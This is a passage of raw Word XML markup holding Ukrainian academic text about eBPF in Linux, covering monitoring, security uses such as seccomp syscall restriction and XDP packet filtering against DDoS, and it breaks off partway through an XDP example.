          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Моніторингу та трасування виконання програм та системних подій.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Підвищення безпеки (наприклад, через контроль доступу або моніторинг мережевих підключень).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Покращення продуктивності, шляхом створення ефективних методів збору та обробки метрик.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Підтримки нових функцій в </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>без потреби в переписуванні коду ядра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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Отже, </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF є потужним інструментом для інтеграції додаткових функцій у ядро </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>без значних змін у її архітектурі. Його застосування відкриває нові можливості для моніторингу, безпеки, управління мережею і оптимізації ефективності роботи сучасних ІТ систем. Технологія постійно розвивається і знаходить нові області застосування, стаючи незамінним інструментом для адміністраторів систем, розробників та інженерів з безпеки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD28B5" w:rsidRPr="00F163FA" w:rsidRDefault="00BD28B5" w:rsidP="00BC794C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD28B5" w:rsidRPr="00F163FA" w:rsidRDefault="00BD28B5" w:rsidP="00BD28B5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2. Роль </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> у системах безпеки та моніторингу</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD28B5" w:rsidRPr="00F163FA" w:rsidRDefault="00BD28B5" w:rsidP="00BC794C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD28B5" w:rsidRPr="000B0BB1" w:rsidRDefault="007F018F" w:rsidP="007F018F">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Використання eBPF для безпеки та моніторингу дозволяє не тільки ефективно аналізувати та реагувати на події в реальному часі,</w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> але й </w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>мінімізувати ризики, пов’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">язані з шкідливим кодом чи атаками на систему. У цьому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>розділі</w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>розглянемо роль e</w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">BPF у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>двох</w:t>
      </w:r>
      <w:r w:rsidR="00236344">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основних</w:t>
      </w:r>
      <w:r w:rsidR="00236344">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аспектах:</w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>системах</w:t>
      </w:r>
      <w:r w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>безпеки та системах моніторингу</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="000B0BB1" w:rsidP="000B0BB1">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0B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF надає широкі можливості для захисту системи та забезпечення її безпеки. Завдяки можливості виконувати програми безпосередньо в ядрі </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, можна створювати гнучкі і потужні механізми безпеки, які дозволяють блокувати атаки на ранньому етапі та здійснювати моніторинг підозрілих дій.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="000B0BB1" w:rsidP="000B0BB1">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0B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Осн</w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>овні механізми безпеки з eBPF</w:t>
      </w:r>
      <w:r w:rsidR="007F018F" w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [4]</w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00901C8B" w:rsidP="000B0BB1">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1. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Контрол</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ь системних викликів (seccomp). Seccomp – </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>це механізм, який обмежує доступ до системних викликів для конкретного процесу чи контейнера. З допомогою eBPF можна реалізувати політики, які дозволяють блокувати небажані або небезпечні системні виклики, що знижує ризик зловживань та зловмисних дій.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для прикладу:</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> можна обмежити доступ до системних викликів, таких як </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>`execve()`</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, щоб запобігти виконанню шкідлив</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, або обмежити можливос</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ті для процесу маніпулювати пам’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яттю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00901C8B" w:rsidP="000B0BB1">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2. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Філь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>трація мережевих пакетів (XDP). XDP (Express Data Path)</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> дозволяє обробляти мережеві пакети на дуже ранньому етапі, безпосередньо в драйвері мережевого інтерфейсу. Це дозволяє ефективно блокувати небажані мережеві пакети (наприклад, DDoS-атаки) ще до того, як вони досягнуть ядра або користувацького простору.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для прикладу:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
